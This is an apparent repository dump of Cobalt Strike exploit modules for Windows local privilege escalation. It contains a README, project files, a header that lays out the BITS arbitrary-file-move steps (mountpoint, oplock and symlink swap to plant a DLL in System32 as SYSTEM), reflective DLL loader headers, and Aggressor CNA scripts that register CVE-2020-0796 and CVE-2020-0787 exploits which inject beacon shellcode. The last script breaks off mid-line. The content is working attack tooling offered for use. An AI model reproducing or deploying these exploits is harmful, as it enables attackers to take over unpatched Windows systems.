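		: buffer_(std::move(other.buffer_)), size_(other.size_) {
		other.size_ = 0;
	}

	typed_buffer_ptr& operator=(typed_buffer_ptr&& other) noexcept {
		if (this != &other) {
			buffer_ = std::move(other.buffer_);
			size_ = other.size_;
			other.size_ = 0;
		}
		return *this;
	}

	// Byte length of the buffer.
	size_t size() const {
		return size_;
	}
};
-------------------------------------------------------------------------------- /CVE-2020-0787_CNA/README.md: --------------------------------------------------------------------------------
1 | ## CVE-2020-0787_CNA ReflectiveDllSource For Cobalt Strike
2 | Use named pipes for CVE-2020-0787 command execution response.
3 |
4 | ![](https://cdn.jsdelivr.net/gh/yanghaoi/ReflectiveDllSource/CVE-2020-0787_CNA/CobaltStrikeShow.gif)
5 |
6 | ## Get More CNA
7 |
8 | https://github.com/yanghaoi/CobaltStrike_CNA
9 |
10 | ## Reference
11 | https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION
-------------------------------------------------------------------------------- /CVE-2020-0787_CNA/reflective_dll.sln: --------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30503.244
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "reflective_dll", "reflective_dll.vcxproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}"
7 | EndProject
8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "BitsArbitraryFileMove", "BitsArbitraryFileMove\BitsArbitraryFileMove.vcxproj", "{36C758EB-8C26-4DD6-915E-7030275418A5}"
9 | EndProject
10 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CommonUtils", "CommonUtils\CommonUtils.vcxproj", "{2AA6AB5E-18A8-49F4-B25D-587E8C3E4432}"
11 | EndProject
12 | Global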
13 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 14 | Debug|ARM = Debug|ARM 15 | Debug|Win32 = Debug|Win32 16 | Debug|x64 = Debug|x64 17 | Release|ARM = Release|ARM 18 | Release|Win32 = Release|Win32 19 | Release|x64 = Release|x64 20 | EndGlobalSection 21 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 22 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|ARM.ActiveCfg = Debug|ARM 23 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|ARM.Build.0 = Debug|ARM 24 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Debug|Win32 25 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Debug|Win32 26 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.ActiveCfg = Debug|x64 27 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.Build.0 = Debug|x64 28 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|ARM.ActiveCfg = Release|ARM 29 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|ARM.Build.0 = Release|ARM 30 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32 31 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32 32 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.ActiveCfg = Release|x64 33 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.Build.0 = Release|x64 34 | {36C758EB-8C26-4DD6-915E-7030275418A5}.Debug|ARM.ActiveCfg = Debug|ARM 35 | {36C758EB-8C26-4DD6-915E-7030275418A5}.Debug|ARM.Build.0 = Debug|ARM 36 | {36C758EB-8C26-4DD6-915E-7030275418A5}.Debug|Win32.ActiveCfg = Debug|Win32 37 | {36C758EB-8C26-4DD6-915E-7030275418A5}.Debug|Win32.Build.0 = Debug|Win32 38 | {36C758EB-8C26-4DD6-915E-7030275418A5}.Debug|x64.ActiveCfg = Debug|x64 39 | {36C758EB-8C26-4DD6-915E-7030275418A5}.Debug|x64.Build.0 = Debug|x64 40 | {36C758EB-8C26-4DD6-915E-7030275418A5}.Release|ARM.ActiveCfg = Release|ARM 41 | {36C758EB-8C26-4DD6-915E-7030275418A5}.Release|ARM.Build.0 = Release|ARM 42 | {36C758EB-8C26-4DD6-915E-7030275418A5}.Release|Win32.ActiveCfg = Release|Win32 43 | 
{36C758EB-8C26-4DD6-915E-7030275418A5}.Release|Win32.Build.0 = Release|Win32 44 | {36C758EB-8C26-4DD6-915E-7030275418A5}.Release|x64.ActiveCfg = Release|x64 45 | {36C758EB-8C26-4DD6-915E-7030275418A5}.Release|x64.Build.0 = Release|x64 46 | {2AA6AB5E-18A8-49F4-B25D-587E8C3E4432}.Debug|ARM.ActiveCfg = Debug|ARM 47 | {2AA6AB5E-18A8-49F4-B25D-587E8C3E4432}.Debug|ARM.Build.0 = Debug|ARM 48 | {2AA6AB5E-18A8-49F4-B25D-587E8C3E4432}.Debug|Win32.ActiveCfg = Debug|Win32 49 | {2AA6AB5E-18A8-49F4-B25D-587E8C3E4432}.Debug|Win32.Build.0 = Debug|Win32 50 | {2AA6AB5E-18A8-49F4-B25D-587E8C3E4432}.Debug|x64.ActiveCfg = Debug|x64 51 | {2AA6AB5E-18A8-49F4-B25D-587E8C3E4432}.Debug|x64.Build.0 = Debug|x64 52 | {2AA6AB5E-18A8-49F4-B25D-587E8C3E4432}.Release|ARM.ActiveCfg = Release|ARM 53 | {2AA6AB5E-18A8-49F4-B25D-587E8C3E4432}.Release|ARM.Build.0 = Release|ARM 54 | {2AA6AB5E-18A8-49F4-B25D-587E8C3E4432}.Release|Win32.ActiveCfg = Release|Win32 55 | {2AA6AB5E-18A8-49F4-B25D-587E8C3E4432}.Release|Win32.Build.0 = Release|Win32 56 | {2AA6AB5E-18A8-49F4-B25D-587E8C3E4432}.Release|x64.ActiveCfg = Release|x64 57 | {2AA6AB5E-18A8-49F4-B25D-587E8C3E4432}.Release|x64.Build.0 = Release|x64 58 | EndGlobalSection 59 | GlobalSection(SolutionProperties) = preSolution 60 | HideSolutionNode = FALSE 61 | EndGlobalSection 62 | GlobalSection(ExtensibilityGlobals) = postSolution 63 | SolutionGuid = {056E3D45-E7FD-4BEE-95A5-0CBAF9DA7DB3} 64 | EndGlobalSection 65 | EndGlobal 66 | -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/reflective_dll.vcproj: -------------------------------------------------------------------------------- 1 | 2 | 11 | 12 | 15 | 18 | 19 | 20 | 21 | 22 | 29 | 32 | 35 | 38 | 41 | 44 | 55 | 58 | 61 | 64 | 71 | 74 | 77 | 80 | 83 | 86 | 89 | 92 | 93 | 100 | 103 | 106 | 109 | 112 | 116 | 127 | 130 | 133 | 136 | 143 | 146 | 149 | 152 | 155 | 158 | 161 | 164 | 165 | 173 | 176 | 179 | 182 | 185 | 188 | 200 | 203 | 206 | 209 | 218 | 221 | 224 | 
227 | 230 | 233 | 236 | 240 | 241 | 249 | 252 | 255 | 258 | 261 | 265 | 280 | 283 | 286 | 289 | 299 | 302 | 305 | 308 | 311 | 314 | 317 | 321 | 322 | 323 | 324 | 325 | 326 | 331 | 334 | 335 | 338 | 339 | 340 | 345 | 348 | 349 | 352 | 353 | 354 | 355 | 356 | 357 | 358 | -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/reflective_dll.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | ARM 7 | 8 | 9 | Debug 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | ARM 19 | 20 | 21 | Release 22 | Win32 23 | 24 | 25 | Release 26 | x64 27 | 28 | 29 | 30 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949} 31 | reflective_dll 32 | Win32Proj 33 | 10.0 34 | 35 | 36 | 37 | DynamicLibrary 38 | v142 39 | Unicode 40 | false 41 | 42 | 43 | DynamicLibrary 44 | v142 45 | Unicode 46 | false 47 | 48 | 49 | DynamicLibrary 50 | v142 51 | Unicode 52 | 53 | 54 | DynamicLibrary 55 | v142 56 | Unicode 57 | 58 | 59 | v142 60 | DynamicLibrary 61 | Unicode 62 | 63 | 64 | v142 65 | Unicode 66 | DynamicLibrary 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | <_ProjectFileVersion>11.0.50727.1 86 | 87 | 88 | $(SolutionDir)$(Configuration)\$(Platform) 89 | $(Configuration)\$(Platform)\ 90 | true 91 | 92 | 93 | $(SolutionDir)$(Configuration)\$(Platform) 94 | $(Configuration)\$(Platform)\ 95 | true 96 | 97 | 98 | $(SolutionDir)$(Configuration)\$(Platform)\ 99 | $(Configuration)\$(Platform)\ 100 | false 101 | false 102 | 103 | 104 | $(SolutionDir)$(Configuration)\$(Platform) 105 | $(Configuration)\$(Platform)\ 106 | false 107 | false 108 | 109 | 110 | .dll 111 | $(SolutionDir)$(Configuration)\$(Platform)\ 112 | $(Configuration)\$(Platform)\ 113 | 114 | 115 | $(SolutionDir)$(Configuration)\$(Platform) 116 | $(Configuration)\$(Platform)\ 117 | 118 | 119 | 120 | 121 | Disabled 122 | 
WIN32;_DEBUG;_WINDOWS;_USRDLL;WIN_X86;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions) 123 | true 124 | EnableFastChecks 125 | MultiThreadedDebug 126 | 127 | 128 | Level3 129 | ProgramDatabase 130 | 131 | 132 | true 133 | Windows 134 | 135 | 136 | 137 | 138 | 139 | Disabled 140 | WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions) 141 | true 142 | EnableFastChecks 143 | MultiThreadedDebugDLL 144 | 145 | 146 | Level3 147 | ProgramDatabase 148 | 149 | 150 | true 151 | Windows 152 | 153 | 154 | 155 | 156 | 157 | MaxSpeed 158 | OnlyExplicitInline 159 | true 160 | Size 161 | false 162 | WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_X86;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions) 163 | MultiThreaded 164 | true 165 | 166 | 167 | Level3 168 | ProgramDatabase 169 | CompileAsCpp 170 | false 171 | 172 | 173 | $(OutDir)$(ProjectName).dll 174 | false 175 | Windows 176 | true 177 | true 178 | 179 | 180 | 181 | 182 | 183 | 184 | 185 | 186 | 187 | MaxSpeed 188 | OnlyExplicitInline 189 | true 190 | Size 191 | false 192 | WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_ARM;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions) 193 | MultiThreaded 194 | true 195 | 196 | 197 | Level3 198 | ProgramDatabase 199 | CompileAsCpp 200 | 201 | 202 | $(OutDir)$(ProjectName).dll 203 | false 204 | Windows 205 | true 206 | true 207 | 208 | 209 | 210 | 211 | 212 | 213 | 214 | 215 | false 216 | 217 | 218 | MultiThreaded 219 | Level3 220 | OnlyExplicitInline 221 | true 222 | Size 223 | true 224 | _WIN64;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;WIN_X64;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions) 225 | 226 | 227 | 228 | 229 | 
_WIN64;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;WIN_X64;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions) 230 | Level3 231 | Disabled 232 | MultiThreadedDebug 233 | 234 | 235 | 236 | 237 | 238 | 239 | 240 | 241 | 242 | 243 | 244 | 245 | 246 | {36c758eb-8c26-4dd6-915e-7030275418a5} 247 | 248 | 249 | 250 | 251 | 252 | -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/reflective_dll.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | 14 | 15 | Source Files 16 | 17 | 18 | Source Files 19 | 20 | 21 | 22 | 23 | Header Files 24 | 25 | 26 | Header Files 27 | 28 | 29 | Header Files 30 | 31 | 32 | -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/reflective_dll.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/src/BitsArbitraryFileMove.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | /* 4 | 0) Prepare workspace 5 | Create C:\workspace\ 6 | Create C:\workspace\mountpoint\ 7 | Create C:\workspace\bait\ 8 | Create C:\workspace\FakeDll.dll 9 | 10 | C:\workspace 11 | |__ mountpoint 12 | |__ redir 13 | |__ FakeDll.dll 14 | 15 | 1) Create a mountpoint 16 | C:\workspace\mountpoint\ -> C:\workspace\bait\ 17 | 18 | 2) Create the group / job / add file / etc. 
19 | LocalFile = C:\workspace\mountpoint\test.txt 20 | 21 | At this point, a tmp file should have been created with user impersonation 22 | C:\workspace\bait\BITD857.tmp 23 | 24 | 3) Set an oplock on the tmp file 25 | C:\workspace\bait\BITD857.tmp 26 | 27 | 4) Resume the job 28 | The oplock will be triggered on the write operation as user 29 | 30 | 5) Switch the mountpoint and create symlinks 31 | C:\workspace\mountpoint\ -> \RPC Control 32 | \RPC Control\BITD857.tmp -> \??\C:\workspace\FakeDll.dll 33 | \RPC Control\test.txt -> \??\C:\Windows\System32\FakeDll.dll 34 | 35 | 6) Release the oplock 36 | The MoveFileW operation should be done as System 37 | */ 38 | 39 | #include 40 | #include 41 | 42 | #define MAX_FILENAME 32 43 | #define MAX_MSG 1024 44 | 45 | class BitsArbitraryFileMove 46 | { 47 | private: 48 | BOOL m_bCustomSourceFile; 49 | WCHAR m_wszWorkspaceDirPath[MAX_PATH]; 50 | WCHAR m_wszMountpointDirPath[MAX_PATH]; 51 | WCHAR m_wszBaitDirPath[MAX_PATH]; 52 | WCHAR m_wszSourceFilePath[MAX_PATH]; 53 | WCHAR m_wszTargetFilePath[MAX_PATH]; 54 | WCHAR m_wszBitsLocalFileName[MAX_FILENAME]; 55 | WCHAR m_wszBitsTempFileName[MAX_FILENAME]; 56 | WCHAR m_wszBitsTempFilePath[MAX_PATH]; 57 | 58 | public: 59 | // Constructor / Destructor 60 | BitsArbitraryFileMove(); 61 | ~BitsArbitraryFileMove(); 62 | 63 | public: 64 | BOOL Run(LPCWSTR pwszDstFile); // e.g.: Destination="C:\Windows\System32\FakeDll.dll" 65 | BOOL Run(LPCWSTR pwszSrcFile, LPCWSTR pwszDstFile); // e.g.: Source="C:\Workspace\FakeDll.dll", Destination="C:\Windows\System32\FakeDll.dll" 66 | void PrintSuccess(LPCWSTR pwszMsg); 67 | 68 | private: 69 | BOOL PrepareWorkspace(); 70 | BOOL WriteSourceFile(); 71 | BOOL FindBitsTempFile(); 72 | BOOL TargetFileExists(); 73 | void CleanUp(); 74 | }; 75 | 76 | -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/src/ReflectiveDLLInjection.h: -------------------------------------------------------------------------------- 1 
| //===============================================================================================// 2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) 3 | // All rights reserved. 4 | // 5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 6 | // provided that the following conditions are met: 7 | // 8 | // * Redistributions of source code must retain the above copyright notice, this list of 9 | // conditions and the following disclaimer. 10 | // 11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of 12 | // conditions and the following disclaimer in the documentation and/or other materials provided 13 | // with the distribution. 14 | // 15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to 16 | // endorse or promote products derived from this software without specific prior written permission. 17 | // 18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND 20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | // POSSIBILITY OF SUCH DAMAGE. 
27 | //===============================================================================================// 28 | #ifndef _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H 29 | #define _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H 30 | //===============================================================================================// 31 | #define WIN32_LEAN_AND_MEAN 32 | #include 33 | 34 | // we declare some common stuff in here... 35 | 36 | #define DLL_QUERY_HMODULE 6 37 | 38 | #define DEREF( name )*(UINT_PTR *)(name) 39 | #define DEREF_64( name )*(DWORD64 *)(name) 40 | #define DEREF_32( name )*(DWORD *)(name) 41 | #define DEREF_16( name )*(WORD *)(name) 42 | #define DEREF_8( name )*(BYTE *)(name) 43 | 44 | typedef ULONG_PTR (WINAPI * REFLECTIVELOADER)( VOID ); 45 | typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID ); 46 | 47 | #define DLLEXPORT __declspec( dllexport ) 48 | 49 | //===============================================================================================// 50 | #endif 51 | //===============================================================================================// 52 | -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/src/ReflectiveLoader.h: -------------------------------------------------------------------------------- 1 | //===============================================================================================// 2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) 3 | // All rights reserved. 4 | // 5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 6 | // provided that the following conditions are met: 7 | // 8 | // * Redistributions of source code must retain the above copyright notice, this list of 9 | // conditions and the following disclaimer. 
10 | // 11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of 12 | // conditions and the following disclaimer in the documentation and/or other materials provided 13 | // with the distribution. 14 | // 15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to 16 | // endorse or promote products derived from this software without specific prior written permission. 17 | // 18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND 20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | // POSSIBILITY OF SUCH DAMAGE. 
27 | //===============================================================================================//
28 | #ifndef _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
29 | #define _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
30 | //===============================================================================================//
31 | #define WIN32_LEAN_AND_MEAN
// NOTE(review): the three `#include` targets were stripped by the page
// extraction; the types below (HMODULE, FARPROC, LIST_ENTRY, _rotr) need
// <windows.h> and <intrin.h> at least — confirm upstream.
32 | #include
33 | #include
34 | #include
35 |
36 | #include "ReflectiveDLLInjection.h"
37 |
// Function-pointer typedefs for the few imports the loader needs; they are
// located at run time rather than through the import table.
38 | typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR );
39 | typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR );
40 | typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD );
41 | typedef DWORD (NTAPI * NTFLUSHINSTRUCTIONCACHE)( HANDLE, PVOID, ULONG );
42 |
// Precomputed values of hash() (below) for module and export names, so the
// loader can match names without carrying the strings — the exact inputs
// are not in view.
// Defender note: the ror-13 scheme and these specific constants are a
// well-known, widely signatured fingerprint of reflective loaders; static
// rules on the constants and on the rotate-by-13 loop are a practical
// detection.
43 | #define KERNEL32DLL_HASH 0x6A4ABC5B
44 | #define NTDLLDLL_HASH 0x3CFA685D
45 |
46 | #define LOADLIBRARYA_HASH 0xEC0E4E8E
47 | #define GETPROCADDRESS_HASH 0x7C0DFCAA
48 | #define VIRTUALALLOC_HASH 0x91AFCA54
49 | #define NTFLUSHINSTRUCTIONCACHE_HASH 0x534C0AB8
50 |
// ARM relocation types and the MOVW/MOVT encoding masks used when applying
// them.
51 | #define IMAGE_REL_BASED_ARM_MOV32A 5
52 | #define IMAGE_REL_BASED_ARM_MOV32T 7
53 |
54 | #define ARM_MOV_MASK (DWORD)(0xFBF08000)
55 | #define ARM_MOV_MASK2 (DWORD)(0xFBF08F00)
56 | #define ARM_MOVW 0xF2400000
57 | #define ARM_MOVT 0xF2C00000
58 |
// Rotation amount for hash(); changing it invalidates every *_HASH above.
59 | #define HASH_KEY 13
60 | //===============================================================================================//
61 | #pragma intrinsic( _rotr )
62 |
// Rotate d right by HASH_KEY (13) bits.
63 | __forceinline DWORD ror( DWORD d )
64 | {
65 | return _rotr( d, HASH_KEY );
66 | }
67 |
// Case-sensitive rolling hash of a NUL-terminated string: for each byte,
// rotate the accumulator right by 13 and add the byte.
// NOTE(review): the do/while consumes *c before testing, so an empty string
// reads one byte past its terminator. `register` is removed in C++17; the
// Release configuration in reflective_dll.vcxproj appears to compile as C++
// (CompileAsCpp), so this will not build with a strict C++17 toolchain.
68 | __forceinline DWORD hash( char * c )
69 | {
70 | register DWORD h = 0;
71 | do
72 | {
73 | h = ror( h );
74 | h += *c;
75 | } while( *++c );
76 |
77 | return h;
78 | }
79 | //===============================================================================================//
// Layout mirror of ntdll's UNICODE_STRING.
80 | typedef struct _UNICODE_STR
81 | {
82 | USHORT Length;
83 | USHORT MaximumLength;
84 | PWSTR pBuffer;
85 | } UNICODE_STR, *PUNICODE_STR;
86 |
87 | // WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
88 |
//__declspec( align(8) ) 89 | typedef struct _LDR_DATA_TABLE_ENTRY 90 | { 91 | //LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry. 92 | LIST_ENTRY InMemoryOrderModuleList; 93 | LIST_ENTRY InInitializationOrderModuleList; 94 | PVOID DllBase; 95 | PVOID EntryPoint; 96 | ULONG SizeOfImage; 97 | UNICODE_STR FullDllName; 98 | UNICODE_STR BaseDllName; 99 | ULONG Flags; 100 | SHORT LoadCount; 101 | SHORT TlsIndex; 102 | LIST_ENTRY HashTableEntry; 103 | ULONG TimeDateStamp; 104 | } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY; 105 | 106 | // WinDbg> dt -v ntdll!_PEB_LDR_DATA 107 | typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes 108 | { 109 | DWORD dwLength; 110 | DWORD dwInitialized; 111 | LPVOID lpSsHandle; 112 | LIST_ENTRY InLoadOrderModuleList; 113 | LIST_ENTRY InMemoryOrderModuleList; 114 | LIST_ENTRY InInitializationOrderModuleList; 115 | LPVOID lpEntryInProgress; 116 | } PEB_LDR_DATA, * PPEB_LDR_DATA; 117 | 118 | // WinDbg> dt -v ntdll!_PEB_FREE_BLOCK 119 | typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes 120 | { 121 | struct _PEB_FREE_BLOCK * pNext; 122 | DWORD dwSize; 123 | } PEB_FREE_BLOCK, * PPEB_FREE_BLOCK; 124 | 125 | // struct _PEB is defined in Winternl.h but it is incomplete 126 | // WinDbg> dt -v ntdll!_PEB 127 | typedef struct __PEB // 65 elements, 0x210 bytes 128 | { 129 | BYTE bInheritedAddressSpace; 130 | BYTE bReadImageFileExecOptions; 131 | BYTE bBeingDebugged; 132 | BYTE bSpareBool; 133 | LPVOID lpMutant; 134 | LPVOID lpImageBaseAddress; 135 | PPEB_LDR_DATA pLdr; 136 | LPVOID lpProcessParameters; 137 | LPVOID lpSubSystemData; 138 | LPVOID lpProcessHeap; 139 | PRTL_CRITICAL_SECTION pFastPebLock; 140 | LPVOID lpFastPebLockRoutine; 141 | LPVOID lpFastPebUnlockRoutine; 142 | DWORD dwEnvironmentUpdateCount; 143 | LPVOID lpKernelCallbackTable; 144 | DWORD dwSystemReserved; 145 | DWORD dwAtlThunkSListPtr32; 146 | PPEB_FREE_BLOCK pFreeList; 147 | DWORD dwTlsExpansionCounter; 
148 | LPVOID lpTlsBitmap; 149 | DWORD dwTlsBitmapBits[2]; 150 | LPVOID lpReadOnlySharedMemoryBase; 151 | LPVOID lpReadOnlySharedMemoryHeap; 152 | LPVOID lpReadOnlyStaticServerData; 153 | LPVOID lpAnsiCodePageData; 154 | LPVOID lpOemCodePageData; 155 | LPVOID lpUnicodeCaseTableData; 156 | DWORD dwNumberOfProcessors; 157 | DWORD dwNtGlobalFlag; 158 | LARGE_INTEGER liCriticalSectionTimeout; 159 | DWORD dwHeapSegmentReserve; 160 | DWORD dwHeapSegmentCommit; 161 | DWORD dwHeapDeCommitTotalFreeThreshold; 162 | DWORD dwHeapDeCommitFreeBlockThreshold; 163 | DWORD dwNumberOfHeaps; 164 | DWORD dwMaximumNumberOfHeaps; 165 | LPVOID lpProcessHeaps; 166 | LPVOID lpGdiSharedHandleTable; 167 | LPVOID lpProcessStarterHelper; 168 | DWORD dwGdiDCAttributeList; 169 | LPVOID lpLoaderLock; 170 | DWORD dwOSMajorVersion; 171 | DWORD dwOSMinorVersion; 172 | WORD wOSBuildNumber; 173 | WORD wOSCSDVersion; 174 | DWORD dwOSPlatformId; 175 | DWORD dwImageSubsystem; 176 | DWORD dwImageSubsystemMajorVersion; 177 | DWORD dwImageSubsystemMinorVersion; 178 | DWORD dwImageProcessAffinityMask; 179 | DWORD dwGdiHandleBuffer[34]; 180 | LPVOID lpPostProcessInitRoutine; 181 | LPVOID lpTlsExpansionBitmap; 182 | DWORD dwTlsExpansionBitmapBits[32]; 183 | DWORD dwSessionId; 184 | ULARGE_INTEGER liAppCompatFlags; 185 | ULARGE_INTEGER liAppCompatFlagsUser; 186 | LPVOID lppShimData; 187 | LPVOID lpAppCompatInfo; 188 | UNICODE_STR usCSDVersion; 189 | LPVOID lpActivationContextData; 190 | LPVOID lpProcessAssemblyStorageMap; 191 | LPVOID lpSystemDefaultActivationContextData; 192 | LPVOID lpSystemAssemblyStorageMap; 193 | DWORD dwMinimumStackCommit; 194 | } _PEB, * _PPEB; 195 | 196 | typedef struct 197 | { 198 | WORD offset:12; 199 | WORD type:4; 200 | } IMAGE_RELOC, *PIMAGE_RELOC; 201 | //===============================================================================================// 202 | #endif 203 | //===============================================================================================// 204 | 
-------------------------------------------------------------------------------- /CVE-2020-0796_CNA/CVE_2020_0796_CNA_4.0.cna: -------------------------------------------------------------------------------- 1 | sub CVE_2020_0796 { 2 | local('$stager $arch $dll'); 3 | if (!-is64 $1) { 4 | berror($1, "cve-2020-0796 exploit is x64 only"); 5 | return; 6 | } 7 | btask($1, "Task Beacon to run " . listener_describe($2) . " via CVE-2020-0796"); #KB4551762 8 | $arch = "x64"; 9 | $dll = getFileProper(script_resource("modules"), "CVE_2020_0796.dll"); 10 | $stager = transform(shellcode($2, false, $arch),"hex"); 11 | bdllspawn!($1, $dll,$stager, "Elevation of local privileges", 5000); 12 | beacon_link($1, $null, $2, $arch); 13 | 14 | } 15 | beacon_exploit_register("CVE_2020_0796", "CVE-2020-0796", &CVE_2020_0796); 16 | -------------------------------------------------------------------------------- /CVE-2020-0796_CNA/CVE_2020_0796_CNA_4.2.cna: -------------------------------------------------------------------------------- 1 | #cs4.2 2 | sub CVE_2020_0796 { 3 | local('$stager'); 4 | foreach $key => $value (binfo($1)) { 5 | println("$[15]key $value"); 6 | } 7 | $winbuild = binfo($1, "build"); 8 | show_message($winbuild); 9 | if ($winbuild != 18362 && $winbuild != 